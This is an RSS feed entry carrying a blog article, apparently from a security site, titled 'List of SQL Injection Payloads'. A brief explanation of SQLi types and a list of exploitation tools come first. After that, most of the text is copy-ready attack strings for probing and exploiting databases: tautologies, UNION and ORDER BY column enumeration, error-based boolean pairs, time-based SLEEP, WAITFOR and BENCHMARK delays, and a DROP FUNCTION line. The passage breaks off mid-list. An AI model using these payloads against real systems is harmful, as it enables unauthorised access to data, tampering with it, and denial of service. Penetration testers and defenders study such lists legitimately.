<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>SQL &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/sql/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Sat, 27 Apr 2024 09:38:39 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.2</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>SQL &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>List of SQL Injection Payloads</title>
		<link>https://en.anonyviet.com/list-of-sql-injection-payloads/</link>
					<comments>https://en.anonyviet.com/list-of-sql-injection-payloads/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 27 Apr 2024 09:38:39 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[List]]></category>
		<category><![CDATA[Payloads]]></category>
		<category><![CDATA[SQL]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=15428</guid>

					<description><![CDATA[In this article, I will explain what SQL injection is, some common examples, explain how to find and exploit different types of SQL injection vulnerabilities, and How to prevent SQL injection. Join the channel Telegram belong to AnonyViet 👉 Link 👈 What is SQL injection (SQLi)? SQL injection is a web security vulnerability that allows [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>In this article, I will explain what SQL injection is, some common examples, explain how to find and exploit different types of SQL injection vulnerabilities, and <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fsql-injection-la-gi-lam-the-nao-de-ngan-chan-lo-hong-sql-injection%2F" class="local-link" rel="noopener">How to prevent SQL injection</a>.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="13165" fifu-featured="1" fetchpriority="high" decoding="async" class="aligncenter wp-image-42531 size-full" src="https://anonyviet.com/wp-content/uploads/2022/07/1_zB5JlbMSA26pklzNRAmSEg.jpg" alt="SQL Injection Payload List" title="SQL Injection Payload List" width="611" height="354" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_zB5JlbMSA26pklzNRAmSEg.jpg 611w, https://anonyviet.com/wp-content/uploads/2022/07/1_zB5JlbMSA26pklzNRAmSEg-300x174.jpg 300w" sizes="(max-width: 611px) 100vw, 611px"/></p>
<h2 id="ftoc-sql-injection-sqli-la-gi" class="ftwp-heading">What is SQL injection (SQLi)?</h2>
<p>SQL injection is a web security vulnerability that allows attackers to interfere with queries an application makes to its database.  It often allows attackers to see data they wouldn&#39;t normally be able to get.  Includes data belonging to the user or any other data that the application itself can access.  In many cases, an attacker can modify or delete this data, causing persistent changes to the application&#39;s content or behavior.</p>
<p>In some situations, an attacker can escalate a SQL injection attack to compromise the server or back-end infrastructure or perform a denial of service attack.</p>
<h3 id="ftoc-cac-loai-sql-injection" class="ftwp-heading">Types of SQL injection:</h3>
<ul>
<li><strong>In-band SQLi (classic SQLi):</strong> <strong>In-band SQLi</strong> is the most common and easiest to exploit SQL Injection attack method.  In-band SQL Injection occurs when an attacker can use the same communication channel to launch the attack and collect results.  The two most common types of SQL Injection are error-based SQLi and Union-based SQLi.</li>
<li><strong>SQLi based error:</strong> <strong>Error-based SQLi</strong> is an in-band SQL technique that relies on error messages issued by the database server to obtain information about the structure of the database.  In some cases, error-based SQL injection alone is enough for an attacker to enumerate the entire database.</li>
<li><strong>Union-based SQLi:</strong> <strong>SQLi is based on Union</strong> is an in-band SQL injection technique that uses the SQL UNION operator to combine the results of two or more SELECT statements into a single result, which is then returned as part of the HTTP response.</li>
<li><strong>Blind SQLi:</strong> <strong>SQLi Inference</strong>, unlike in-band SQL, can take longer for an attacker to exploit, however, it is just as dangerous as any other form of SQL Injection.  In an SQLi Inference attack, no data is actually transferred through the web application and the attacker will not be able to see the results of an in-band attack (which is why Such an attack is often called a “blind SQL Injection attack”.  Instead, an attacker can rebuild the database structure by sending payloads, observing the web application&#39;s response and the database server&#39;s output.  The two types of inferential SQL Injection are Blind-boolean-based SQLi and blind-time-based SQLi.</li>
<li><strong>Boolean-based (content-based) blind SQLi: Boolean-based SQL Injection</strong> is an inference SQL Injection technique based on sending an SQL query to the database, forcing the application to return a different result depending on whether the query returns TRUE or FALSE.  Depending on the result, the content inside the HTTP response will change or stay the same.  This allows an attacker to infer whether the payload used returned true or false, even though no data from the database was returned.</li>
<li><strong>Time-based blind SQLi</strong>: <strong>SQL Injection is time-based</strong> is an inference SQL Injection technique based on sending an SQL query to the database, forcing the database to wait a specific amount of time (in seconds) before responding.  The response time will tell the attacker whether the result of the query is TRUE or FALSE.  Depending on the result, the HTTP response will be returned delayed or returned immediately.  This allows an attacker to infer whether the payload used returned true or false, even though no data from the database was returned.</li>
<li><strong>Out-of-band SQLi: Out-of-band SQL Injection</strong> not very common, mainly because it depends on the features enabled on the database server being used by the web application.  Out-of-band SQL Injection occurs when an attacker cannot use the same channel to launch the attack and collect results.  Out-of-band techniques,offer attackers an alternative to inference time-based techniques,especially if the server response is not very stable (making an attack based on inference time is not reliable).</li>
<li><strong>Sound-based Sql Injection:</strong> This is a sql injection attack method that can be applied in applications that provide access to the database using voice commands.  An attacker can get information from the database by sending sql queries accompanied by audio.</li>
</ul>
<h3 id="ftoc-cac-cong-cu-quet-lo-hong-sql-injection" class="ftwp-heading">SQL Injection vulnerability scanning tools:</h3>
<ul>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fsqlmapproject%2Fsqlmap" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">SQLMap</a> – Automated SQL injection and database scanning tool</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fron190%2Fjsql-injection" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">jSQL Injection</a> – Java tool for automatic SQL injection</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FNeohapsis%2Fbbqsql" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">BBQSQL</a> – A blind SQL-Injection exploit</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fcodingo%2FNoSQLMap" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">NoSQLMap</a> – Pwnage NoSQL databases automatically</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.kitploit.com%2F2017%2F05%2Fwhitewidow-sql-vulnerability-scanner.html" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">Whitewidow</a> – SQL vulnerability scanner</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fstamparm%2FDSSS" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">DSSS</a> – Small SQLi vulnerability scanner</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fdtag-dev-sec%2Fexplo" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">explore</a> – Web vulnerability testing format</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fawnumar%2Fblind-sql-bitshifting" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">Blind-Sql-Bitshifting</a> – Blind SQL-Injection via Bitshifting</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fleviathan-framework%2Fleviathan" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">Leviathan</a> – Wide range of batch testing tools</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FJohnTroony%2FBlisqy" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">Blisqy</a> – Exploiting time-based blind SQL injection in HTTP-Headers (MySQL/MariaDB)</li>
</ul>
<h2 id="ftoc-cac-payload-sql-injection-chung" class="ftwp-heading">Generic SQL Injection payloads</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">'&#13;
''&#13;
`&#13;
``&#13;
,&#13;
"&#13;
""&#13;
/&#13;
//&#13;
\&#13;
\\&#13;
;&#13;
' or "&#13;
-- or # &#13;
' OR '1&#13;
' OR 1 -- -&#13;
" OR "" = "&#13;
" OR 1 = 1 -- -&#13;
' OR '' = '&#13;
'='&#13;
'LIKE'&#13;
'=0--+&#13;
 OR 1=1&#13;
' OR 'x'='x&#13;
' AND id IS NULL; --&#13;
'''''''''''''UNION SELECT '2&#13;
%00&#13;
/*…*/ &#13;
+        addition, concatenate (or space in url)&#13;
||        (double pipe) concatenate&#13;
%        wildcard attribute indicator&#13;
@variable    local variable&#13;
@@variable    global variable&#13;
# Numeric&#13;
AND 1&#13;
AND 0&#13;
AND true&#13;
AND false&#13;
1-false&#13;
1-true&#13;
1*56&#13;
-2&#13;
1' ORDER BY 1--+&#13;
1' ORDER BY 2--+&#13;
1' ORDER BY 3--+&#13;
1' ORDER BY 1,2--+&#13;
1' ORDER BY 1,2,3--+&#13;
1' GROUP BY 1,2,--+&#13;
1' GROUP BY 1,2,3--+&#13;
' GROUP BY columnnames having 1=1 --&#13;
-1' UNION SELECT 1,2,3--+&#13;
' UNION SELECT sum(columnname ) from tablename --&#13;
-1 UNION SELECT 1 INTO @,@&#13;
-1 UNION SELECT 1 INTO @,@,@&#13;
1 AND (SELECT * FROM Users) = 1    &#13;
' AND MID(VERSION(),1,1) = '5';&#13;
' and 1 in (select min(name) from sysobjects where xtype="U" and name &gt; '.') --&#13;
Finding the table name&#13;
Time-Based:&#13;
,(select * from (select(sleep(10)))a)&#13;
%2c(select%20*%20from%20(select(sleep(10)))a)&#13;
';WAITFOR DELAY '0:0:30'--&#13;
Comments:&#13;
#        Hash comment&#13;
/*      C-style comment&#13;
-- -    SQL comment&#13;
;%00    Nullbyte&#13;
`        Backtick</pre>
<h2 id="ftoc-cac-payload-dua-tren-loi" class="ftwp-heading">Error-based payloads</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">OR 1=1&#13;
 OR 1=0&#13;
 OR x=x&#13;
 OR x=y&#13;
 OR 1=1#&#13;
 OR 1=0#&#13;
 OR x=x#&#13;
 OR x=y#&#13;
 OR 1=1-- &#13;
 OR 1=0-- &#13;
 OR x=x-- &#13;
 OR x=y-- &#13;
 OR 3409=3409 AND ('pytW' LIKE 'pytW&#13;
 OR 3409=3409 AND ('pytW' LIKE 'pytY&#13;
 HAVING 1=1&#13;
 HAVING 1=0&#13;
 HAVING 1=1#&#13;
 HAVING 1=0#&#13;
 HAVING 1=1-- &#13;
 HAVING 1=0-- &#13;
 AND 1=1&#13;
 AND 1=0&#13;
 AND 1=1-- &#13;
 AND 1=0-- &#13;
 AND 1=1#&#13;
 AND 1=0#&#13;
 AND 1=1 AND '%'='&#13;
 AND 1=0 AND '%'='&#13;
 AND 1083=1083 AND (1427=1427&#13;
 AND 7506=9091 AND (5913=5913&#13;
 AND 1083=1083 AND ('1427=1427&#13;
 AND 7506=9091 AND ('5913=5913&#13;
 AND 7300=7300 AND 'pKlZ'='pKlZ&#13;
 AND 7300=7300 AND 'pKlZ'='pKlY&#13;
 AND 7300=7300 AND ('pKlZ'='pKlZ&#13;
 AND 7300=7300 AND ('pKlZ'='pKlY&#13;
 AS INJECTX WHERE 1=1 AND 1=1&#13;
 AS INJECTX WHERE 1=1 AND 1=0&#13;
 AS INJECTX WHERE 1=1 AND 1=1#&#13;
 AS INJECTX WHERE 1=1 AND 1=0#&#13;
 AS INJECTX WHERE 1=1 AND 1=1--&#13;
 AS INJECTX WHERE 1=1 AND 1=0--&#13;
 WHERE 1=1 AND 1=1&#13;
 WHERE 1=1 AND 1=0&#13;
 WHERE 1=1 AND 1=1#&#13;
 WHERE 1=1 AND 1=0#&#13;
 WHERE 1=1 AND 1=1--&#13;
 WHERE 1=1 AND 1=0--&#13;
 ORDER BY 1-- &#13;
 ORDER BY 2-- &#13;
 ORDER BY 3-- &#13;
 ORDER BY 4-- &#13;
 ORDER BY 5-- &#13;
 ORDER BY 6-- &#13;
 ORDER BY 7-- &#13;
 ORDER BY 8-- &#13;
 ORDER BY 9-- &#13;
 ORDER BY 10-- &#13;
 ORDER BY 11-- &#13;
 ORDER BY 12-- &#13;
 ORDER BY 13-- &#13;
 ORDER BY 14-- &#13;
 ORDER BY 15-- &#13;
 ORDER BY 16-- &#13;
 ORDER BY 17-- &#13;
 ORDER BY 18-- &#13;
 ORDER BY 19-- &#13;
 ORDER BY 20-- &#13;
 ORDER BY 21-- &#13;
 ORDER BY 22-- &#13;
 ORDER BY 23-- &#13;
 ORDER BY 24-- &#13;
 ORDER BY 25-- &#13;
 ORDER BY 26-- &#13;
 ORDER BY 27-- &#13;
 ORDER BY 28-- &#13;
 ORDER BY 29-- &#13;
 ORDER BY 30-- &#13;
 ORDER BY 31337-- &#13;
 ORDER BY 1# &#13;
 ORDER BY 2# &#13;
 ORDER BY 3# &#13;
 ORDER BY 4# &#13;
 ORDER BY 5# &#13;
 ORDER BY 6# &#13;
 ORDER BY 7# &#13;
 ORDER BY 8# &#13;
 ORDER BY 9# &#13;
 ORDER BY 10# &#13;
 ORDER BY 11# &#13;
 ORDER BY 12# &#13;
 ORDER BY 13# &#13;
 ORDER BY 14# &#13;
 ORDER BY 15# &#13;
 ORDER BY 16# &#13;
 ORDER BY 17# &#13;
 ORDER BY 18# &#13;
 ORDER BY 19# &#13;
 ORDER BY 20# &#13;
 ORDER BY 21# &#13;
 ORDER BY 22# &#13;
 ORDER BY 23# &#13;
 ORDER BY 24# &#13;
 ORDER BY 25# &#13;
 ORDER BY 26# &#13;
 ORDER BY 27# &#13;
 ORDER BY 28# &#13;
 ORDER BY 29# &#13;
 ORDER BY 30#&#13;
 ORDER BY 31337#&#13;
 ORDER BY 1 &#13;
 ORDER BY 2 &#13;
 ORDER BY 3 &#13;
 ORDER BY 4 &#13;
 ORDER BY 5 &#13;
 ORDER BY 6 &#13;
 ORDER BY 7 &#13;
 ORDER BY 8 &#13;
 ORDER BY 9 &#13;
 ORDER BY 10 &#13;
 ORDER BY 11 &#13;
 ORDER BY 12 &#13;
 ORDER BY 13 &#13;
 ORDER BY 14 &#13;
 ORDER BY 15 &#13;
 ORDER BY 16 &#13;
 ORDER BY 17 &#13;
 ORDER BY 18 &#13;
 ORDER BY 19 &#13;
 ORDER BY 20 &#13;
 ORDER BY 21 &#13;
 ORDER BY 22 &#13;
 ORDER BY 23 &#13;
 ORDER BY 24 &#13;
 ORDER BY 25 &#13;
 ORDER BY 26 &#13;
 ORDER BY 27 &#13;
 ORDER BY 28 &#13;
 ORDER BY 29 &#13;
 ORDER BY 30 &#13;
 ORDER BY 31337 &#13;
 RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='&#13;
 RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='&#13;
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--&#13;
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--&#13;
%' AND 8310=8310 AND '%'='&#13;
%' AND 8310=8311 AND '%'='&#13;
 and (select substring(@@version,1,1))='X'&#13;
 and (select substring(@@version,1,1))='M'&#13;
 and (select substring(@@version,2,1))='i'&#13;
 and (select substring(@@version,2,1))='y'&#13;
 and (select substring(@@version,3,1))='c'&#13;
 and (select substring(@@version,3,1))='S'&#13;
 and (select substring(@@version,3,1))='X'</pre>
<h2 id="ftoc-cac-payload-sql-injection-dua-tren-thoi-gian" class="ftwp-heading">SQL Injection payloads are time-based</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic"># from wapiti&#13;
sleep(5)#&#13;
1 or sleep(5)#&#13;
" or sleep(5)#&#13;
' or sleep(5)#&#13;
" or sleep(5)="&#13;
' or sleep(5)='&#13;
1) or sleep(5)#&#13;
") or sleep(5)="&#13;
') or sleep(5)='&#13;
1)) or sleep(5)#&#13;
")) or sleep(5)="&#13;
')) or sleep(5)='&#13;
;waitfor delay '0:0:5'--&#13;
);waitfor delay '0:0:5'--&#13;
';waitfor delay '0:0:5'--&#13;
";waitfor delay '0:0:5'--&#13;
');waitfor delay '0:0:5'--&#13;
");waitfor delay '0:0:5'--&#13;
));waitfor delay '0:0:5'--&#13;
'));waitfor delay '0:0:5'--&#13;
"));waitfor delay '0:0:5'--&#13;
benchmark(10000000,MD5(1))#&#13;
1 or benchmark(10000000,MD5(1))#&#13;
" or benchmark(10000000,MD5(1))#&#13;
' or benchmark(10000000,MD5(1))#&#13;
1) or benchmark(10000000,MD5(1))#&#13;
") or benchmark(10000000,MD5(1))#&#13;
') or benchmark(10000000,MD5(1))#&#13;
1)) or benchmark(10000000,MD5(1))#&#13;
")) or benchmark(10000000,MD5(1))#&#13;
')) or benchmark(10000000,MD5(1))#&#13;
pg_sleep(5)--&#13;
1 or pg_sleep(5)--&#13;
" or pg_sleep(5)--&#13;
' or pg_sleep(5)--&#13;
1) or pg_sleep(5)--&#13;
") or pg_sleep(5)--&#13;
') or pg_sleep(5)--&#13;
1)) or pg_sleep(5)--&#13;
")) or pg_sleep(5)--&#13;
')) or pg_sleep(5)--&#13;
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe&#13;
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='&#13;
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)&#13;
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--&#13;
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#&#13;
SLEEP(5)#&#13;
SLEEP(5)--&#13;
SLEEP(5)="&#13;
SLEEP(5)='&#13;
or SLEEP(5)&#13;
or SLEEP(5)#&#13;
or SLEEP(5)--&#13;
or SLEEP(5)="&#13;
or SLEEP(5)='&#13;
waitfor delay '00:00:05'&#13;
waitfor delay '00:00:05'--&#13;
waitfor delay '00:00:05'#&#13;
benchmark(50000000,MD5(1))&#13;
benchmark(50000000,MD5(1))--&#13;
benchmark(50000000,MD5(1))#&#13;
or benchmark(50000000,MD5(1))&#13;
or benchmark(50000000,MD5(1))--&#13;
or benchmark(50000000,MD5(1))#&#13;
pg_SLEEP(5)&#13;
pg_SLEEP(5)--&#13;
pg_SLEEP(5)#&#13;
or pg_SLEEP(5)&#13;
or pg_SLEEP(5)--&#13;
or pg_SLEEP(5)#&#13;
'\"&#13;
AnD SLEEP(5)&#13;
AnD SLEEP(5)--&#13;
AnD SLEEP(5)#&#13;
&amp;&amp;SLEEP(5)&#13;
&amp;&amp;SLEEP(5)--&#13;
&amp;&amp;SLEEP(5)#&#13;
' AnD SLEEP(5) ANd '1&#13;
'&amp;&amp;SLEEP(5)&amp;&amp;'1&#13;
ORDER BY SLEEP(5)&#13;
ORDER BY SLEEP(5)--&#13;
ORDER BY SLEEP(5)#&#13;
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)&#13;
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#&#13;
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--&#13;
+benchmark(3200,SHA1(1))+'&#13;
+ SLEEP(10) + '&#13;
RANDOMBLOB(500000000/2)&#13;
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))&#13;
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))&#13;
RANDOMBLOB(1000000000/2)&#13;
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))&#13;
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))&#13;
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/</pre>
<h2 id="ftoc-cac-payload-union" class="ftwp-heading">Payload Unions</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">ORDER BY SLEEP(5)
ORDER BY 1,SLEEP(5)
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
ORDER BY SLEEP(5)#
ORDER BY 1,SLEEP(5)#
ORDER BY 1,SLEEP(5),3#
ORDER BY 1,SLEEP(5),3,4#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
ORDER BY SLEEP(5)-- 
ORDER BY 1,SLEEP(5)-- 
ORDER BY 1,SLEEP(5),3-- 
ORDER BY 1,SLEEP(5),3,4-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11-- 
